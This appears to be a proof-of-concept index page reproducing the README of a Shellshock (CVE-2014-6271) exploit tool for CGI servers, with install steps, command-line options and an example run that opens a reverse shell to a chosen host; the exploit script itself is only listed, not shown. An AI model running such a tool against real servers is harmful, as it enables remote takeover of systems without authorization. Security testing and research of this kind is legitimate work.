CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source

Associated Vulnerability

Description

The Shellshock Exploit is a tool designed to efficiently exploit the Shellshock vulnerability (CVE-2014-6271) in susceptible CGI servers, enabling a precise takeover of the target server. Shellshock is a critical security vulnerability that affects the Bash shell, allowing attackers to execute arbitrary commands on the targeted system

Readme

# Shellshock Exploit (CVE-2014-6271)

## Description
The Shellshock Exploit is a tool designed to efficiently exploit the Shellshock vulnerability (CVE-2014-6271) in susceptible CGI servers, enabling a precise takeover of the target server. Shellshock is a critical security vulnerability that affects the Bash shell, allowing attackers to execute arbitrary commands on the targeted system.

## Key Features
- **Exploit Automation:** Automates the exploitation of the Shellshock vulnerability in CGI scripts, streamlining the process for penetration testing and security research.
- **Reverse Shell Connectivity:** Provides options for establishing a reverse shell connection to the target server, supporting various methods such as Netcat (nc), TCP, and PHP.
- **Customizable Options:** Allows users to specify the target host, CGI script, remote host for the reverse shell, port, and preferred shell method through command-line options.

## CVE Information
- CVE Number: [CVE-2014-6271](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)
- CVE Description: Bash through 4.3 allows remote attackers to execute arbitrary commands via crafted environment variables passed to Bash scripts.

## How it Works

![gif](https://github.com/MY7H404/CVE-2014-6271-Shellshock/blob/main/gif.gif)
## Requirements

**Debian/Ubuntu**
```
sudo apt-get install libcurl4-openssl-dev
```
**Red Hat/Fedora**
```
sudo dnf install libcurl-devel
```
**macOS (Homebrew)**
```
brew install curl-openssl
```
After installing the libcurl development package, install the CVE-2014-6271-Shellshock:
```
git clone https://github.com/MY7H404/CVE-2014-6271-Shellshock.git
cd CVE-2014-6271-Shellshock
pip3 install -r requirements.txt
python3 shellshock.py -a HOST -u /cgi/test -r REMOTE -p 1337 -s tcp
```

## Usage
```
python3 shellshock.py [-h] -a HOST -u URI -r REMOTE -p PORT [-s {nc,tcp,php}]
```

## Options
```
-h, --help: Show help message and exit
-a HOST, --host HOST: Specify a remote host to test
-u URI, --uri URI: Specify a CGI script to test (e.g., /cgi/test)
-r REMOTE, --remote REMOTE: Specify the host for the reverse shell connection
-p PORT, --port PORT: Specify the port for the reverse shell connection
-s {nc,tcp,php}, --shell {nc,tcp,php}: Choose your preferred reverse shell method for seamless connectivity (default 'nc')
```

## Example
```
python3 shellshock.py -a 10.10.10.10 -u /cgi/test -r localhost -p 4444 -s tcp
```

## Disclaimer

This tool is created for educational and testing purposes only. The authors and contributors are not responsible for any illegal, unethical, or unauthorized use of this tool. Users are solely responsible for ensuring that their use of this tool complies with all applicable laws, regulations, and ethical standards.

Usage of this tool on systems or networks without explicit authorization is strictly prohibited. The authors and contributors disclaim any responsibility for any damage, loss of data, or other consequences resulting from the use of this tool.

By using this tool, you acknowledge that you have read, understood, and agree to abide by the terms of this disclaimer.

**Use responsibly and ethically.**

## License
This project is licensed under the [MIT License.](https://github.com/MY7H404/CVE-2014-6271-Shellshock/blob/main/LICENSE)

File Snapshot

 [4.0K]  /data/pocs/aa8d6168315cb808af04eb4fb19daf387fa1e8a5
├── [556K]  gif.gif
├── [1.0K]  LICENSE
├── [3.2K]  README.md
├── [  36]  requirements.txt
└── [6.0K]  shellshock.py

0 directories, 5 files

Remarks